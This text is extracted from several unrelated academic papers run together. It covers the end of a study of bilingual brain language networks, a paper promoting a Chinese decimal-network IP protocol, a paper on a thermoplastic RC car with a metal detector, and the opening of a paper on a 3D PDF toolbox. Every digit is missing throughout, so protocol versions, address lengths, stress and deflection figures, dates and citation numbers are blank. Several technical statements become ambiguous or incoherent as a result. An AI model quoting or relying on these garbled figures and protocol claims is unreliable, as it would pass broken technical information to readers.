closely related language combinations. conclusion in sum, while cortical language networks, involving left inferior frontal and left middle temporal regions, largely overlapped between second language users and native speak- ers, nontraditional language areas in inferior parietal regions show connectivity differences, hinting at less automatic pro- cessing of an l , thus requiring more cognitive control. acknowledgments this research was supported by an nwo toptalent (grant no. . . ) to k.w. the authors would like to thank monique flecken for helpful feedback on the manuscript. author disclosure statement no competing financial interests exist. references abutalebi j, annoni jm, zimine i, pegna aj, seghier ml, lee- jahnke h, lazeyras f, cappa sf, khateb a. . language control and lexical competition in bilinguals: an event-related fmri study. cereb cortex : – . bach e, brown c, marslen-wilson w. . crossed and nested dependencies in german and dutch: a psycholinguistic study. lang cogn process : – . clahsen h, felser c. . how native-like is non-native lan- guage processing? trends cogn sci : – . consonni m, cafiero r, marin d, tettamanti m, iadanza a, fab- bro f, perani d. . neural convergence for language com- prehension and grammatical class production in highly proficient bilinguals is independent of age of acquisition. cortex : – . dallas a, kaan e. . second language processing of filler- gap dependencies by late learners. lang linguist compass : – . davidson dj, indefrey p. . plasticity of grammatical recur- sion in german learners of dutch. lang cogn process : – . den ouden d-b, saur d, mader w, schelter b, lukic s, wali e, timmer j, thompson ck. . network modulation during complex syntactic processing. neuroimage : – . duncan j. . the multiple-demand ( md) system of the pri- mate brain: mental programs for intelligent behaviour. trends cogn sci : – . friederici ad, gierhan sme. . the language network. curr opin neurobiol : – . friston kj, penny wd, glaser de. . conjunction revisited. neuroimage : – . green dw, abutalebi j. . language control in bilinguals: the adaptive control hypothesis. j cogn psychol (hove) : – . griffiths jd, marslen-wilson wd, stamatakis ea, tyler lk. . functional organization of the neural language system: dorsal and ventral pathways are critical for syntax. cereb cortex : – . grodzinsky y, friederici ad. . neuroimaging of syntax and syntactic processing. curr opin neurobiol : – . hagoort p. . on broca, brain, and binding: a new frame- work. trends cogn sci : – . hagoort p. . nodes and networks in the neural architecture for language: broca’s region and beyond. curr opin neuro- biol : – . hagoort p, indefrey p. . the neurobiology of language be- yond single words. annu rev neurosci : – . hartsuiker rj, pickering mj, veltkamp e. . is syntax separate or shared between languages?: cross-linguistic syntactic prim- ing in spanish-english bilinguals. psychol sci : – . humphreys gf, lambon ralph ma. . fusion and fission of cognitive functions in the human parietal cortex. cereb cor- tex : – . indefrey p. . a meta-analysis of hemodynamic studies on first and second language processing: which suggested differ- ences can we trust and what do they mean? lang learn : – . kaan e, vasić n. . cross-serial dependencies in dutch: test- ing the influence of np type on processing load. mem cognit : – . luke k-k, liu h-l, wai y-y, wan y-l, tan lh. . func- tional anatomy of syntactic and semantic processing in lan- guage comprehension. hum brain mapp : – . mclaren dg, ries ml, xu g, johnson sc. . a generalized form of context-dependent psychophysiological interactions (gppi): a comparison to standard approaches. neuroimage : – . menenti l, gierhan sm, segaert k, hagoort p. . shared language: overlap and segregation of the neuronal infrastruc- ture for speaking and listening revealed by functional mri. psychol sci : – . nieuwland ms, van berkum jja. . individual differences and contextual bias in pronoun resolution: evidence from erps. brain res : – . noonan ka, jefferies e, visser m, lambon ralph ma. . going beyond inferior prefrontal involvement in semantic control: evidence for the additional contribution of dorsal an- gular gyrus and posterior middle temporal cortex. j cogn neurosci : – . weber et al. nowak ma, komarova nl, niyogi p. . computational and evolutionary aspects of language. nature : – . perani d, paulesu e, galles ns, dupoux e, dehaene s, betti- nardi v, cappa sf, fazio f, mehler j. . the bilingual brain. proficiency and age of acquisition of the second lan- guage. brain : – . schoonbaert s, hartsuiker rj, pickering mj. . the repre- sentation of lexical and syntactic information in bilinguals: evidence from syntactic priming. j mem lang : – . sebastian r, laird a, kiran s. . meta-analysis of the neural representation of first language and second language. appl psycholinguist : – . segaert k, menenti l, weber k, petersson km, hagoort p. . shared syntax in language production and language comprehension—an fmri study. cereb cortex : – . snijders tm, petersson km, hagoort p. . effective connec- tivity of cortical and subcortical regions during unification of sentence structure. neuroimage : – . snijders tm, vosse t, kempen g, van berkum jja, petersson km, hagoort p. . retrieval and unification of syntactic structure in sentence comprehension: an fmri study using word-category ambiguity. cereb cortex : – . stromswold k, caplan d, alpert n, rauch s. . localization of syntactic comprehension by positron emission tomogra- phy. brain lang : – . tyler lk, marslen-wilson wd, randall b, wright p, dever- eux bj, zhuang j, papoutsi m, stamatakis ea. . left inferior frontal cortex and syntax: function, structure and behaviour in patients with left hemisphere damage. brain : – . uddén j, ingvar m, hagoort p, petersson km. . implicit ac- quisition of grammars with crossed and nested non-adjacent dependencies: investigating the push-down stack model. cogn sci : – . ullman mt. a. the neural basis of lexicon and grammar in first and second language: the declarative/procedural model. bilingualism lang cogn : – . ullman mt. b. a neurocognitive perspective on language: the declarative/procedural model. nat rev neurosci : – . ullman mt. . is broca’s area part of a basal ganglia thala- mocortical circuit? cortex : – . weber k. . the language learning brain: evidence from sec- ond language learning and bilingual studies of syntactic pro- cessing. phd, radboud university, nijmegen. weber k, indefrey p. . syntactic priming in german–en- glish bilinguals during sentence comprehension. neuroimage : – . zwart j-w. . verb clusters in continental west germanic dialects. in: black jr, motapanyane v (eds.) microparamet- ric syntax and dialect variation. amsterdam/philadelphia, pa: john benjamins publishing company; pp. – . address correspondence to: kirsten weber max planck institute for psycholinguistics p.o. box ah nijmegen the netherlands e-mail: kirsten.weber@mpi.nl brain networks in second language users international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - discussion on decimal network based on ipv hu shun guilin university of electronic technology xu dongmei, gao lin china institute of electronic technology standardization abstract—this paper introduces the core technology of decimal network digital domain name and ipv protocol family, and analyzes the technical characteristics of decimal network. three kinds of common network transition techniques are listed, and various problems of decimal network application are discussed. keywords-decimal network; digital domain names; ipv i. introduction tcp/ip network architecture and protocol standards in recent years, computer network research and application of hot technology. at present, the widely used ip protocol is ipv , based on which the internet has become the largest computer network system in the world. however, with the rapid development of economic globalization and modern communication technology and network, the scale of computer network is expanding rapidly, and ipv protocol starts to expose various problems. such as: ip address resources, address allocation efficiency is low, no consideration of confidential transmission. facts show that ipv cannot meet the requirements of future internet development. in this context, countries around the world have stepped up the work of the next generation of internet protocols. ipv has been selected as an international standard by the internet engineering task force (ietf), while ipv proposed in was abandoned by the etf due to its large address. later, with the introduction of digital domain name system (ddns), gradually developed into a -bit address ipv decimal network with china's independent intellectual property rights. ii. digital domain name technology the so-called digital domain name, refers to the arabic numerals ( ~ ) as the internet intelligent terminal domain name. the coding of digital domain name refers to the telephone coding rules. it adopts a hierarchical structure according to different regions and consists of root, country/region, and city and user code from top to bottom. digital domain names provide users with an alternative to english domain names. at the same time, they have the following characteristics: ● use of class telephone numbers to facilitate domain name management and division; ● make it easier and faster to browse the internet on smart terminals in the future; ● provides conditions for the realization of network end-to-end communication in the future; ● number resources can be integrated to facilitate the integration of the three networks. decimal network introduced the digital domain name system, and can be compatible with english domain name, chinese domain name system. through international journal of advanced network, monitoring and controls volume , no. , the dns of the domain name server, the digital domain name entered by the user is converted into the corresponding ip address to achieve the purpose of accessing the host. currently, ddns maps digital domain names to dynamic ip addresses by installing a small program on the client side. when the user dial-up internet access, the user will be dynamic ip address and user's digital domain name information notification server, the server will be the user's digital domain name and dynamic ip address registered in the ddns resolution system, and then began to provide digital domain name resolution services. when the user is offline, the user's digital domain name information is removed from the ddns resolution system. at present, digital domain name system and ipv protocol has been recognized by some countries and regions. china has developed some ipv related network equipment and systems, solved the problem of interconnection between ipv network and ipv network, and realized the independent function of domain name resolution, domain name allocation, ip address allocation and mac address allocation. after several years of trial operation, the experimental system established in jinshan county, changning district and fujian province has been successfully tested in five small projects. the shanghai experimental area is connected to ipv networks in beijing and hangzhou by tunnel. in addition, various applications based on the ipv decimal network have been developed or are being developed. iii. ipv protocol family ipv protocol family is a decimal network base protocol, including ipv header protocol, address protocol and transition protocol. a. ipv header protocol ipv packet header format and field meaning are specified, including basic header and extended header. ) basic headers the basic header format specified in the ipv header protocol is shown in table . table i. ipv header format version category flow label payload length under one head hop limit source address the destination address version: the length is bits, indicating the protocol version number. category: length bits, to as priority values. the priority classes through are used to specify communication settings and are used by packet senders to control traffic. to is used to specify traffic that will not fall back in the event of congestion. and assign audio and video, called absolute values, to ensure uninterrupted transmission of audio and video. others are reserved values. ● stream label: a length of bits, used to identify packets belonging to the same traffic. ● net charge length: the length is bits, indicating the number of bytes of the packet behind the ipv header. ● next header: the length is bits, which indicates the protocol type in the header field that follows the ipv header. international journal of advanced network, monitoring and controls volume , no. , ● jump limit: the length is bits, indicating the maximum number of times the packet can be forwarded by the node. ● source address: the length is bit, representing the sender address. ● destination address: the length is bit, representing the recipient address. ) extended headers between the packet ipv header and the high-level protocol header, there may be specialized headers, called extended headers, to represent optional internet layer information. the number of extended headers is small, and each is identified by a different next header value. the ipv packet can come with no or multiple extended headers, which need to be defined by the next header field in the previous header. the extended header of ipv protocol includes six types: segment selection, route selection, segmentation, destination options, identification and encapsulation of security payloads. according to the ipv header protocol, ipv header adopts the form of basic header + extended header chain. compared to the ipv header, the ipv header has removed the header length field and replaced the type of service field with the traffic class field. the protocol type and time-to-live (ttl) fields have been renamed and slightly modified. in addition, the flow label field has been added. although the total length of the ipv base header is nearly four times that of the default ipv header ( bytes), to bytes, it is actually simplified. because the vast majority of the header is occupied by two -byte ipv addresses, the rest of the header takes up only eight bytes. b. ipv address protocol the ipv address protocol specifies that the ipv address is bits, enabling a large addressing space of . according to the data transmission mode, it can be divided into unicast, on-demand and multicast. in addition, the addressing model of ipv , text representation of ipv address, text representation of address prefix, address type representation, monocular address, multiple destinations address and other contents are also specified. ● ipv addressing model: specifies that all types of ipv addresses are assigned to interfaces, not nodes. ● textual representation of pv addresses: specifies that ipv addresses use "bracket decimal" notation. ipv addresses can be divided into pure ipv addresses, ipv -compatible ipv addresses, ipv -compatible ipv addresses, special compatible addresses, full decimal addresses, and transitional ipv addresses. for convenience of reading, some abbreviations are specified for text representation of addresses. ● textual representation of address prefixes: address prefixes for ipv addresses are specified to reflect the network hierarchy. ● address type representation: specifies some of the high boot bits of the ipv address as the format prefix fp to indicate different types of ipv addresses. the length of these format prefixes varies. ● monocular address: represents a single network interface. messages addressed to monocular address will be sent to the unique network interface identified by it. the forms of monocular addresses specified in the ipv address protocol include the aggregated global monocular address, the decimal internet address, the domain name decision and assignment organization address, the ipx address, the local ipv monocular address, and the ipv compatible address. international journal of advanced network, monitoring and controls volume , no. , ● multiple destinations address: a class of ipv addresses assigned to multiple network interfaces at the same time. the ipv address protocol states that multiple destinations address addresses are assigned from single-mesh addresses, using the same format as single-mesh addresses. when a monocular address is assigned to multiple network interfaces, it is functionally converted to a multiple destinations address. c. ipv interim agreement the ipv transition protocol specifies the header format of the ipv transition and the definition of the address text representation, addressing model, and node address, including a detailed description of the current transition header and address format defined. the transitional headers used the original ipv header, only changing the version number to to distinguish it from the original ipv header. the transitional address adopts the latter two segments of the ipv address, a total of bits. iv. technical features of ipv decimal network a. address space the wealth of ip address resources is undoubtedly an important advantage of the ipv decimal network. due to the -bit address, the theoretical address capacity is , which is said to be able to assign a permanent address to the world's human needs for years, and can be automatically increased sequentially after years. so the address is large enough to solve the ipv address resource constraints. b. digital domain name system digital domain name is an important part of ipv decimal network system, which is compatible with english domain name and chinese domain name. it is impossible to replace english domain names, but it is a good choice for users who are not used to english domain names. in addition, due to digital domain name technology, the decimal network system can be the domain name, ip address, mac address unified representation into decimal text. c. automatic configuration according to ipv plug and play data, ipv supports stateless and stately host address automatic configuration, which uses dhcp of ipv . d. security the special encryption mechanism is adopted to ensure the safe transmission of network data. e. mobility support the ipv decimal network establishes an ipv tunnel between the mobile unit and the home agent, and then relays the packets to the mobile unit's home address received by the "proxy" of the mobile unit through the tunnel to the current location of the mobile unit, so as to realize the support for network terminal mobility. ipv decimal network introduced the digital domain name technology, convenient digital button internet, simplified the difficulty of network management. the expansion of address space and the introduction of security mechanisms have solved the problems faced by ipv networks. support for qos, automatic configuration, and mobility enables it to better meet multiple business requirements. ipv protocol can theoretically meet the requirements of the new generation of internet development. at present, after the experimental verification stage, completed the development of basic hardware equipment, has entered the stage of small-scale application. v. transition technology from ipv to ipv although ipv has many technical features and can solve various problems faced by ipv , ipv has a long history. the ipv decimal network is not likely to replace the huge ipv network in a short time, but will go through a long process of coexistence and transition. drawing on a number of ipv technologies, lpv also international journal of advanced network, monitoring and controls volume , no. , supports the ietf next generation internet transition working group to propose dual stack, tunneling technology, and nat-pt (network address translation/protocol translation). a. dual protocol stack technology this is the simplest way to handle transition problems. this mechanism enables the device to handle both types of protocols by running both pv and ipv stacks on a single device, as shown in table . table ii. structure diagram of double protocol stack the application layer transport layer (tcp/udp protocol) ipv ipv network interface layer the dual stack mechanism is intuitive and easy to understand. the problem is that the dual stack still requires the corresponding host to configure ipv addresses, otherwise it is invalid, which goes against the original intention of using ipv to solve the problem of insufficient ipv addresses. in practice, it is impossible for all hosts or terminals to upgrade to support dual stacks, and using dual stacks will increase the burden on hosts and reduce performance. therefore, the application must be combined with other technologies. b. tunneling technology tunneling provides a way to pass ipv data over existing ipv routing systems, as shown in figure . the technical principle is that at the entrance of the tunnel, the router encapsulates the pv data packet into the ipv packet, whose source address and destination address are the ipv addresses of the tunnel entrance and exit respectively. the encapsulated ipv packet will be transmitted through the ipv routing body, and the protocol domain of the packet header is set to . indicates that the load of this packet is an ipv packet, which is taken out and forwarded to the destination station at the exit of the tunnel. ipv network ipv network ipv public networks r r tunnel port tunnel port figure . ipv over ipv tunnels tunneling technology requires modifications only at the entrance and exit of the tunnel, with no other requirements, and is therefore very easy to implement. it is currently the most widely used transition technology, the disadvantage is that ipv host and ipv host cannot achieve direct communication. transitional ipv decimal network supports two tunnel technologies: ipv over ipv and ipv over ipv , which can be divided into automatic configuration and manual configuration according to address configuration. the improved technology includes tunnel agent technology. c. nat - pt nat-pt technology is a protocol translation technology that performs both header and semantic translation (pt) between ipv and ipv packets while performing ipv /ipv address translation (nat). through the introduction of nat-pt router, the intercommunication between ipv sub-net and ipv sub-net can be realized. the network structure is shown in figure . international journal of advanced network, monitoring and controls volume , no. , ipv network ipv network nat-pt router figure . nat-pt network structure diagram nat-pt can solve the problem of tunnel technology and realize direct communication between ipv and ipv host, which is suitable for the initial stage of the transition of ipv network with small scale. vi. conclusion the decimal network is based on the digital domain name and ipv , two core technologies independently developed in china, with independent intellectual property rights. at the same time, it can solve various problems faced by the existing ipv network and meet the requirements of the development of the next generation of internet. if it can be applied and popularized, it will promote the great development of the internet and help china get rid of the situation of being restrained by others in internet technology. however, the establishment and promotion of standards is not a simple technical issue, which involves the interests of various countries and groups. therefore, the popularization of decimal network cannot be accomplished overnight, so it should be supported by the state and applied in government departments, military departments and other departments with higher requirements on network performance and security. and then gradually spread to achieve business operations. at the same time, it is also necessary to coordinate the relationship between domestic and foreign interest groups and promote their international standardization process, so as to finally achieve the goal of completely replacing the existing ipv network. reference [ ] xie jianping, huang changfu. current situation and development of decimal network [j]. information technology and standardization, ( ): - . [ ] huang changfu. interpretation of digital domain name specification [j]. information technology and standardization, ( ): - . [ ] zhang yunghui, jiang xinhua, lin zhangxi. comparison between ipv and ipv [j]. computer engineering, ( ): - . [ ] farinacci d., fuller v., meyer d., lewis d. interworking lisp with ipv and ipv ”, draft-ietf- lisp-interworking- , aug. . [ ] jung h., & koh s.j. mobile optimized future internet”, http://protocol.knu.ac.kr/tech/cpl-tr- - -mofi- .pdf, jun. . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - design and analysis of thermoplastic metal detector rc car with wireless charging haifa el-sadi wentworth institute of technology mechanical engineering department boston, ma e-mail: elsadih@wit.edu matthew r. cole, aaron m. denis wentworth institute of technology mechanical engineering department boston, ma derek fernandes wentworth institute of technology mechanical engineering department boston, ma alberto benhamu-chocron wentworth institute of technology mechanical engineering department boston, ma abstract—the rc car industry is a growing industry that will always be a past time for the older generation. this research is focused on a specific type of rc car which is a metal detecting one. metal detectors have been developed for many years. through research there aren’t many metal detecting rc cars on the market. currently it’s extremely limited in range and depth of detection. the goal of this research is to improve, build and test a new rc-metal detector technology. a thermoplastic-abs used to build the chassis of the rc- metal detector. abs is easily machined, sanded, glued and painted. finite element analysis is a powerful tool that allows us to quickly analyze and refine a design. when the chassis fixed at front differential (displacement), the value of the maximum stress and the deflection are higher than when the chassis fixed at rear differential. the maximum deflection is shown as about . inches. this value is the resultant of the deflection in all three directions. this research includes, a cost analysis for each piece of the car, group goals for the rc car and metal detector. a working prototype is designed before moving into the final design phase in order to assure that the best possible product can be produced. there is a wireless charging station that ease the process of recharging the battery. keywords-metal detector; finite element; thermoplastic; rc i. introduction the challenge for this project is to design and build a remote-controlled car that incorporates two features that no other car possesses. rc car owners have tedious work to do every time the car needs to be charged. some components must be taken apart to retrieve the battery to charge it. the wireless charging feature being implemented in the design will eliminate this extra work, while providing a smooth charging operation where no disassembling will take place. the design and development of remotely operated solar- powered mobile metal detector robot is a rescue robot to autonomously operate in detecting the threat of land mines. during the first and second world war, military forces deployed many bombs on land filed to fight between soldiers on the battlefield. there were many countries like libya, cambodia and laos had explosive weapons that did not explode when fired or dropped on the ground. in fact, more than twenty thousand people have been killed or injured by unexploded bombs [ ]. a remotely solar-powered mobile metal detector robot has been designed and implemented. the system is using rf communication with atmega mcu in embedded system domain. the robot moves in particular direction using the handheld remote. the experimental work has been carried out carefully. the metal detector sensor worked as the required specification for the metal detection sensor. the testing demonstrated that the robot would not pose any performance problem for the installation of the metal detection robot such as the merits and drawbacks of mounting the sensor, cost, support vehicle, handling the cable between the robot and also easiness of the adjustment [ ]. nation et al. [ ] demonstrated the accuracy of hhmd in the identification and localization of metallic foreign bodies. they proposed an emergency room foreign body protocol that uses hhmd as an early screening tool in triage in order to expedite the process of obtaining otolaryngology consultation and potentially shorten the wait time to the operating room or discharge. in instances were outside films are previously performed, hhmd use may be able to minimize the overall radiation exposure to children by obviating the need for repeat radiographs. as the sensitivity is not %, a negative hhmd screening does not negate the need for a standard radiograph in order to avoid missed mfbs. hhmd is best suited for detection of coins, which accounts for the majority of the mfb ingestions, and may not be suitable for all metallic objects since the amount of metal may decrease its sensitivity. holm, katja f et. al. [ ] evaluated a commercially available metal detector for detecting cieds. design. observational study including pacemaker patients (n = ) international journal of advanced network, monitoring and controls volume , no. , and a control group without pacemaker ( n = ). the investigational device was a hand-held metal detector for detecting metal or electricity wiring. results. the metal detector detected the pacemaker in all pacemaker patients and thus exhibited a sensitivity of %. the specificity of the metal detector was %, and the negative predictive value was %. thirteen individuals without pacemakers were falsely identified as having an implanted device due to implanted prosthetic material or elements of clothing. the objective of this research is to design a rc car that will provide a smooth wireless charging process and incorporate a metal detector. rc cars require tedious work in order to charge the battery. it will offer a wireless charging station where no disassembling of the car will be required. apart from technical innovations, an improved metal detector will be incorporated that will be useful on beaches and in parks to search for lost jewelry. a long-term goal with an unlimited budget is to use this car to detect mines for the army. this car could drive over the field before infantry and passenger vehicles drive over it to protect them from mines or ieds. ii. material and cost acrylonitrile butadiene styrene (abs) is an opaque thermoplastic and amorphous polymer. abs becomes liquid at a certain temperature, degrees fahrenheit. they can be heated to their melting point, cooled, and re-heated again without significant degradation. instead of burning, thermoplastics like abs liquefy which allows them to be easily injection molded and then subsequently recycled. abs is easily machined, sanded, glued and painted. this makes it a great material for prototyping. table shows the required material to build the rc-car metal detector. table i. the material and the components of rc-car metal detector a. finite element analysis of material solidworks simulation uses the displacement formulation of the finite element method to calculate component displacements, strains, and stresses under internal and external loads. the geometry under analysis is discretized using tetrahedral ( d), and solved by iterative solver. solidworks simulation using p adaptive element type, the solution has converged. the material parameters were obtained and the results were simulated. one of the most important inputs to the model is the elastic modulus e of the material. the elastic modulus defines the stiffness (resistance to deflection) of the material. its value is determined from material tests. a material with a high value of e will deflect less than one with a lower value of e. by applying finite element analysis, we can accurately observe the stress distributions in the various layers of the material as shown in figures , , and . figure shows chassis fixed at rear differential, the highest stress is psi with mesh size was . . however, the maximum deflection was . inches as shown in figure . simulates impact on underside of chassis. b. abs plastic material data elastic modulus: . psi, shear modulus: . psi, and tensile strength: . psi international journal of advanced network, monitoring and controls volume , no. , figure . chassis fixed at rear differential (von mises) figure . chassis fixed at rear differential (displacement) figure shows chassis fixed at front differential (displacement), the highest stress is psi with mesh size was . . however, the maximum deflection was . inches as shown in figure , it simulates impact on underside of chassis international journal of advanced network, monitoring and controls volume , no. , figure . chassis fixed at front differential (von mises) figure . chassis fixed at front differential (displacement) iii. design prototype and testing one of the biggest challenges was designing a chassis from scratch that would house all the components necessary to operate a rc car. the chassis also needed to be strong enough to not only hold the weight of the car and all its components, as shown in figure , but also handle the torque and power that would be outputted from the car. the designed chassis was more than suitable to hold all the components and handle the force of the motor. there was more room than anticipated, which was useful for placing the components and keeping things away from all the moving parts. in the end, the rc car is programmed and moves as planned. the metal detector detects deeper than expected. finally, the wireless charging station works better than anticipated. figure shows the wireless charging ramp setup. international journal of advanced network, monitoring and controls volume , no. , figure . detailed picture of all components figure . layout of the electrical circuit figure shows the layout of the electrical circuit of the rc-car metal detector. the main circuit is powered by a battery through a mechanical switch. if the switch is turned on, power is supplied to a motor and a servo. the speed of the motor is regulated by an electronic speed control circuit (esc). the servo on the hand is controlled by a raspberry pi computer board. the circuit also has four terminals that are used to connect to an external charger once the battery has depleted. figure . wireless charging ramp setup figure . final prototype iv. conclusion this project aimed at creating a thermoplastic rc car designed with a purpose, more than just an average recreational toy. this was bringing up the reality of a much greater idea. the wireless charging aspect of the rc car will mostly be aimed towards small scale vehicles. however, the metal detection can be a very realistic and useful application for much bigger vehicles. the idea that an unmanned vehicle can be used for detecting not only metals, but harmful objects could potentially be a breakthrough for something like the military. ied’s are a very serious issue for the military, being able to sniff these out without having to risk the lives of anyone would be huge. completing this project with a limited budget would show a lot, especially when someone like the military could spend endless amounts of money in order to perfect the system for more dangerous and life like scenarios. fea analysis was used to test the chassis, when the chassis fixed at front differential (displacement), international journal of advanced network, monitoring and controls volume , no. , the value of the maximum stress and the deflection are higher than when the chassis fixed at rear differential. v. acknowledgements the authors sincerely appreciate the immense and highly valued support from the dean of engineering, dean fred driscoll references [ ] handicap international, fatal footprint: the global human impact of cluster munitions. november . available from: url: http://www.mineaction.org [ ] f.y.c. albert, c.h.s. mason, c.k.j. kiing, k.s. ee, k.w. chan, “remotely operated solar-powered mobile metal detector robot”, procedia computer science, volume , , pages - [ ] nation, javan and jiang, wen, “the utility of a handheld metal detector in detection and localization of pediatric metallic foreign body ingestion”, international journal of pediatric otorhinolaryngology january : - [ ] holm, katja f, hjortshøj, søren, pehrson, steen, svendsen, jesper hastrup, riahi, sam, “implanted cardiac devices are reliably detected by commercially available metal detectors”, scandinavian cardiovascular journal. oct , vol. issue , p - . p. http://www.mineaction.org/ submitted february accepted may published june corresponding author axel newe, axel.newe@fau.de academic editor jingbo wang additional information and declarations can be found on page doi . /peerj-cs. copyright newe distributed under creative commons cc-by . open access enriching scientific publications with interactive d pdf: an integrated toolbox for creating ready-to-publish figures axel newe medical applications team, method park engineering gmbh, erlangen, germany chair of medical informatics, friedrich-alexander universität erlangen-nürnberg, erlangen, germany abstract three-dimensional ( d) data of many kinds is produced at an increasing rate throughout all scientific disciplines. the portable document format (pdf) is the de-facto standard for the exchange of electronic documents and allows for embedding three-dimensional models. therefore, it is a well-suited medium for the visualization and the publication of this kind of data. the generation of the appropriate files has been cumbersome so far. this article presents the first release of a software toolbox which integrates the complete workflow for generating d model files and ready-to-publish d pdf documents for scholarly publications in a consolidated working environment. it can be used out-of-the-box as a simple working tool or as a basis for specifically tailored solutions. a comprehensive documentation, an example project and a project wizard facilitate the customization. it is available royalty-free and for windows, macos and linux. subjects computer vision, data science, digital libraries, emerging technologies, scientific computing and simulation keywords portable document format, d-pdf, pdf, u d, universal d, application introduction throughout many scientific disciplines, the availability—and thus the importance—of three-dimensional ( d) data has grown in the recent years. consequently, this data is often the basis for scientific publications, and in order to avoid a loss of information, the visualization of this data should be d whenever possible (tory & möller, ). in contrary to that, almost all contemporary visualization means (paper printouts, computer screens, etc.) only provide a two-dimensional ( d) interface. the most common workaround for this limitation is to project the d data onto the available d plane (newe, ), which results in the so-called ‘‘ . d visualization’’ (tory & möller, ). this projection yields two main problems: limited depth perception and objects that occlude each other. a simple but effective solution of these problems is interaction: by changing the projection angle of a . d visualization (i.e., by changing the point of view), depth perception is improved (tory & möller, ), and at the same time objects that had previously been occluded (e.g., the backside) can be brought to sight. a means of application of this simple solution has been available for many years: the portable document format (pdf) from adobe (adobe, ). this file format is the how to cite this article newe ( ), enriching scientific publications with interactive d pdf: an integrated toolbox for creating ready- to-publish figures. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:axel.newe@fau.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. de-facto standard for the exchange of electronic documents and almost every scientific article that is published nowadays is available as pdf—as well as even articles of the middle of the last century (hugh-jones, ). pdf allows for embedding d models and the adobe reader (http://get.adobe.com/reader/otherversions/) can be used to display these models interactively. nevertheless, this technology seems not to have found broad acceptance among the scientific community until now, although journals encourage authors to use this technology (maunsell, ; elsevier, ). one reason might be that the creation of the appropriate model files and of the final pdf documents is still cumbersome. not everything that is technically possible is accepted by those who are expected to embrace the innovation if the application of this innovation is hampered by inconveniences (hurd, ). generally suitable protocols and procedures have been proposed by a number of authors before, but they all required a toolchain of at least three (kumar et al., ; danz & katsaros, ) or even four (phelps, naeger & marcovici, ; lautenschlager, ) different software applications and up to single steps until the final pdf was created. furthermore, some of the proposed workflows were limited to a certain operating system (os) (phelps, naeger & marcovici, ), required programming skills (barnes et al., ) or relied on commercial software (ruthensteiner & heß, ). especially the latter might be an important limiting factor which hampers the proliferation of the d pdf format in scientific publishing (lautenschlager, ; newe, ). this article presents a comprehensive and highly integrated software tool for the creation of both the d model files (which can be embedded into pdf documents) and the final, ready-to-publish pdf documents with embedded interactive d figures. the presented solution is based on mevislab, available for all major operating systems (windows, macos and linux) and requires no commercial license. the source code is available but does not necessarily need to be compiled since binary add-on installers for all platforms are available. a detailed online documentation, an example project and an integrated wizard facilitate re-use and customization. background and related work the portable document format the portable document format is a document description standard for the definition of electronic documents independent of the software, the hardware or the operating system that is used for creating or consuming (displaying, printing...) it (adobe, a). a pdf file can comprise all necessary information and all resources to completely describe the layout and the content of an electronic document, including texts, fonts, images and multimedia elements like audio, movies or d models. therefore, it fulfils all requirements for an interactive publication document as proposed by thoma et al., ( ). although it is an iso standard (iso - : (iso, )), the specification is available to the full extent from the original developer adobe (adobe, ) and can be used royalty-free. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://get.adobe.com/reader/otherversions/ http://dx.doi.org/ . /peerj-cs. table number of publications related to d pdfs in biomedical sciences since (not compre- hensive). year number of publications with embedded/supplemental d pdf number of publications dealing with/mentioning d pdf – – embedding d models into pdf the fifth edition of the pdf specification (pdf version . (adobe, )), published in , was the first to support so-called ‘‘ d artwork’’ as an embedded multimedia feature. in january , the acrobat product family provided the first implementation of tools for creating and displaying these d models (adobe, ). the latest version (pdf version . (adobe, a)) supports three types of geometry (meshes, polylines and point clouds), textures, animations, render modes, lighting schemes and several other features. the only d file format that is supported by the iso standard (iso, ) is universal d (u d, see section below). support for another d format (product representation compact, prc) has been added by adobe (adobe, b) and has been proposed to be integrated into the replacement norm iso - (pdf . ). however, this new standard is currently only available as draft version (iso, ) and has not yet been adopted. although the first application in scientific context was proposed in november (zlatanova & verbree, ) and thus quite soon after this new technology was available, it took three more years before the first applications were really demonstrated in scholarly articles (ruthensteiner & heß, ; kumar et al., ; barnes & fluke, ). since then, the number of publications that apply pdf d technology either in theory or in practice has increased almost every year (table ). the most sophisticated implementation so far is the reporting of planning results for liver surgery where the pdf roots are hidden behind a user interface which emulates a stand-alone software application (newe, becker & schenk, ). the universal d (u d) file format as outlined above, the u d file format is the only d format that is supported by the current iso specification of pdf. initially designed as an exchange format for computer aided construction (cad), it was later standardized by ecma international (formerly known as european computer manufacturers association, ecma) as ecma- (universal d file format). the latest version is the th edition from june (ecma, ). newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. u d is a binary file format that comprises all information to describe a d scene graph. a u d scene consists of an arbitrary number of objects that can be sorted in an object tree. the geometry of each object can be defined as a triangular mesh, a set of lines or a set of points. a proprietary bit encoding algorithm allows for a highly compressed storage of the geometry data. a number of additional features and entities (textures, lighting, views, animations) can be defined; details are described in previously published articles (newe & ganslandt, ). the scholarly publishing company elsevier invites authors to supplement their articles with d models in u d format (elsevier, ) and many d software tools provide the possibility to export in u d format. however, most of them are commercial software, but open source solutions like meshlab (http://meshlab.sourceforge.net/) are available as well. creating d model files and pdf documents although many tools and libraries are available that support the creation of d model files and of final pdf documents, the whole process is still cumbersome. the problems are manifold: some tools require programming skills; some do not support features those are of interest for scientific d data (like polylines (newe, ) and point clouds barnes & fluke, ). operating system platform support is another issue, as well as royalty-free use. as regards the creation of the d model files, most of these problems have been addressed in a previous article (newe, ). the main problem, however, remains the creation of the final pdfs. specifying the content and (in particular) the layout of a document can be a complex task and is usually the domain of highly specialized word processor software. figures and supplements for scholarly publications, on the other hand, usually have a specific layout where only the contents of (a limited number of) pre-defined elements vary. there are at least three common elements for a scientific figure: the figure itself, a short caption text and a longer descriptive text. if the figure is intended to be provided as supplemental information file instead of being integrated into the main article text, some additional information is necessary as well: at least a general headline and an optional reference to the main article should be provided. if the document content is modularized to these five key elements (fig. ), the creation of the pdf itself becomes a rather simple task, because the layout can be pre-defined. one last difficulty arises from a peculiarity of interactive d figures in pdf: the number viewing options (e.g., camera angle, zoom, lighting...) is nearly unlimited. although such a figure is intended to provide all these options, an author usually wants to define an initial view at the 